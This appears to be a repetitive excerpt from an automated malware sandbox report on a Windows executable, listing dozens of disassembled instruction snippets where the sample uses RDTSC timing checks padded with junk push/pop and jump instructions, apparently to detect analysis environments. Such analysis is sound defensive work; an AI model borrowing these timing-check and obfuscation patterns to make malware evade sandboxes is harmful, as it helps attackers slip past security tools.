            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B218B second address: 5B21AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA4C9084167h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B21AC second address: 5B21BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B21BF second address: 5B21CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007FA4C9084156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B21CA second address: 5B21F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 ja 00007FA4C9026356h 0x0000000b jmp 00007FA4C9026350h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jc 00007FA4C902634Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B2E34 second address: 5B2E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B33A5 second address: 5B33B9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA4C9026348h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ebx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B33B9 second address: 5B33D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C9084169h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B33D7 second address: 5B33E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B9475 second address: 5B9492 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B9492 second address: 5B949C instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4C9026352h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B881A second address: 5B881E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B898A second address: 5B898E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B8C39 second address: 5B8C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B8C41 second address: 5B8C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B8C49 second address: 5B8C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5B8C4F second address: 5B8C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA4C9026346h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5BF7A1 second address: 5BF7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C908415Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5BF7B2 second address: 5BF7B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5BF7B8 second address: 5BF7C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA4C908415Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5BF47B second address: 5BF48F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9026350h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5C2AEA second address: 5C2B06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084168h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5C26D0 second address: 5C26E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 js 00007FA4C9026370h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5C26E0 second address: 5C26EA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4C9084156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5C857E second address: 5C8596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9026352h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5C8891 second address: 5C889B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5C889B second address: 5C88A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5C8A1E second address: 5C8A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 579D7C second address: 579D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 579ECA second address: 579F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D31E1h], eax 0x0000000c mov dword ptr [ebp+1247979Bh], edi 0x00000012 push 0000001Eh 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FA4C9084158h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e mov cx, 5F00h 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5C8CE5 second address: 5C8D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026353h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jnl 00007FA4C9026346h 0x00000012 pop ecx 0x00000013 jl 00007FA4C9026348h 0x00000019 push eax 0x0000001a pop eax 0x0000001b js 00007FA4C902634Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5CD1AD second address: 5CD1C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9084161h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5CD1C4 second address: 5CD1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5CD1C8 second address: 5CD212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084160h 0x00000007 jmp 00007FA4C908415Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FA4C9084162h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007FA4C908415Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5CD212 second address: 5CD216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5CD384 second address: 5CD3A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA4C9084169h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5CD3A2 second address: 5CD3B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA4C9026350h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5CD4ED second address: 5CD509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FA4C908415Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA4C908415Bh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5CD509 second address: 5CD50E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5CD7B3 second address: 5CD7C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FA4C9084156h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c jbe 00007FA4C908415Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 538D96 second address: 538D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 538D9A second address: 538D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 538D9E second address: 538DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5D2B7A second address: 5D2BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jo 00007FA4C9084164h 0x0000000f jmp 00007FA4C908415Eh 0x00000014 jmp 00007FA4C908415Ah 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5DBBE3 second address: 5DBC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA4C902634Dh 0x0000000b jmp 00007FA4C9026355h 0x00000010 jg 00007FA4C9026346h 0x00000016 jmp 00007FA4C9026352h 0x0000001b popad 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA4C9026357h 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5DBC41 second address: 5DBC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5DBC48 second address: 5DBC4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 533E30 second address: 533E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9084163h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FA4C9084166h 0x00000012 push eax 0x00000013 jmp 00007FA4C908415Ch 0x00000018 pop eax 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5D9E49 second address: 5D9E4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5D9E4D second address: 5D9E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA4C908415Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5D9E65 second address: 5D9E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5D9E7A second address: 5D9E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5DA030 second address: 5DA051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FA4C902635Ch 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5DA051 second address: 5DA065 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FA4C9084156h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5DA8E5 second address: 5DA8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA4C9026346h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5DB5A9 second address: 5DB5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA4C9084156h 0x00000009 jmp 00007FA4C9084168h 0x0000000e jmp 00007FA4C908415Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5DB8E5 second address: 5DB914 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007FA4C9026346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FA4C9026354h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop ebx 0x00000015 pushad 0x00000016 jg 00007FA4C9026346h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5E3D2E second address: 5E3D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5E3D34 second address: 5E3D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C902634Dh 0x00000009 jne 00007FA4C9026348h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5E3D53 second address: 5E3D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5E444F second address: 5E4453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5E4607 second address: 5E4615 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA4C9084158h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5E4615 second address: 5E461F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA4C9026346h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC82D second address: 5EC831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC831 second address: 5EC835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC97C second address: 5EC982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC982 second address: 5EC986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC986 second address: 5EC9A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084168h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC9A2 second address: 5EC9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FA4C9026357h 0x0000000c pop edi 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC9C1 second address: 5EC9CE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC9CE second address: 5EC9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC9D5 second address: 5EC9EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C9084163h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC9EE second address: 5EC9F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5EC9F2 second address: 5EC9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ECCD6 second address: 5ECCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ECCDD second address: 5ECCEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FA4C9084156h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ED3E9 second address: 5ED3F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ED3F5 second address: 5ED3F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ED3F9 second address: 5ED40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C902634Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5ED544 second address: 5ED562 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA4C9084164h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5F4616 second address: 5F461A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5F461A second address: 5F4648 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FA4C9084156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FA4C9084158h 0x00000012 pop eax 0x00000013 jl 00007FA4C908416Fh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA4C9084161h 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5F4210 second address: 5F4214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5F4214 second address: 5F421A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5F439B second address: 5F43A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5F43A1 second address: 5F43A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5F43A7 second address: 5F43B3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA4C902634Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 600CC4 second address: 600CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 600CC8 second address: 600CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 600CD6 second address: 600CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 600CDA second address: 600CF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026353h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
